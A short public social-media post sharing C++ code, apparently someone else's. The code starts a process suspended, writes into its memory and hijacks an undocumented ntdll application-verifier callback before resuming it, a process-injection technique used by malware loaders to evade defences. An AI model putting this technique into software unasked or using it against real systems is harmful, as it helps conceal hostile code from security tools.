#codeisn — Public Fediverse posts

// start a second copy of or process in a suspended state so we can set up our callback safely
if (!CreateProcessA(NULL, file_path, NULL, NULL, FALSE, CREATE_SUSPENDED, NULL, NULL, &si, &pi)) {
printf("C() failed, error: %d\n", GetLastError());
}

// overwrite the g_ptr_table in the child process with the already initialized one
if (!WriteProcessMemory(pi.hProcess, &g_ptr_table, &g_ptr_table, sizeof(PTR_TABLE), NULL)) {
printf("Write 1 failed, error: %d\n", GetLastError());
}

// ntdll pointer are encoded using the system pointer cookie located at SharedUserData!Cookie
LPVOID callback_ptr = encode_system_ptr(&LdrGetProcedureAddressCallback);

// set ntdll!AvrfpAPILookupCallbackRoutine to our encoded callback address
if (!WriteProcessMemory(pi.hProcess, (LPVOID)(avrfp_address + 8), &callback_ptr, sizeof(ULONG_PTR), NULL)) {
printf("Write 2 failed, error: %d\n", GetLastError());
}

// set ntdll!AvrfpAPILookupCallbacksEnabled to TRUE
uint8_t bool_true = 1;

if (!WriteProcessMemory(pi.hProcess, (LPVOID)avrfp_address, &bool_true, 1, NULL)) {
printf("Write 3 failed, error: %d\n", GetLastError());
}

// resume the process
ResumeThread(pi.hThread);

DLL proxying and side loading is a fun time :D

#security #cpp #codeisn'tmine #DLL #peb